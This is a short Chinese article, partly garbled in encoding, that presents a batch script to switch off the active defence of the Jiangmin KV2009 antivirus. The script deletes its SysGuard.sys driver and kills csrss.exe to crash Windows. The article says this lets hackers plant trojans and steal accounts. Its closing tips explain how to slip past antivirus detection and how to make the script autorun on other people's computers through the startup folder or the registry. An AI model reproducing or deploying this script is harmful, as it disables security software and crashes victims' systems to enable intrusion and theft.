牧馬人

現(xiàn)在主動防御功能實(shí)在是太火了，所以很多殺毒軟件都加入了這個功能，江民KV系列的殺毒軟件當(dāng)然也不例外。但是，利用文本編輯軟件新建一個*.bat批處理文件，輸入下面這段代碼后保存并運(yùn)行，就可以輕松干掉江民殺毒軟件KV2009的主動防御功能了（如圖）。

@echo off

del %systemroot%system32driversSysGuard.sys /f /q /s

set app_name=csrss.exe

echo 查找進(jìn)程%app_name%,準(zhǔn)備死機(jī)...

(tasklist /nh | findstr /i %app_name%) || (goto dead)

:dead

ntsd -c -q -pn %app_name%

我在虛擬機(jī)和本地系統(tǒng)中分別進(jìn)行了試驗(yàn)，發(fā)現(xiàn)這段代碼非常管用。它的意思非常簡單：首先是刪除江民殺毒軟件中的一個驅(qū)動文件，接著強(qiáng)制結(jié)束一個系統(tǒng)文件的進(jìn)程，造成操作系統(tǒng)死機(jī)（之所以要強(qiáng)制死機(jī)，是因?yàn)闅⒍拒浖淖晕冶Ｗo(hù)功能不允許系統(tǒng)非正常地重新啟動）。當(dāng)重新啟動后，江民殺毒軟件的主動防御功能就失效了，這樣黑客就能比較容易地向用戶的電腦中植入木馬、竊取賬號……

如果你是江民殺毒軟件的用戶，那么此招不得不防，最好經(jīng)常檢查其主動防御功能的工作狀態(tài)，不然電腦被黑客入侵了都還不知道。

1.在試驗(yàn)前，一定要把江民殺毒軟件的SysGuard.sys驅(qū)動文件拷貝到其他地方進(jìn)行備份。因?yàn)槿绻囼?yàn)成功了，那么江民殺毒軟件的主動防御功能就徹底失效了，要想讓它恢復(fù)就得把備份的SysGuard.sys驅(qū)動文件拷貝回去，再重新啟動。

2.最好不要把*.bat放在可執(zhí)行文件里，因?yàn)檫@樣在運(yùn)行時十有八九會被殺毒軟件攔截。

3.在別人的電腦上進(jìn)行試驗(yàn)時，可把*.bat放在啟動文件夾中，或采用修改注冊表的方式讓它自動運(yùn)行。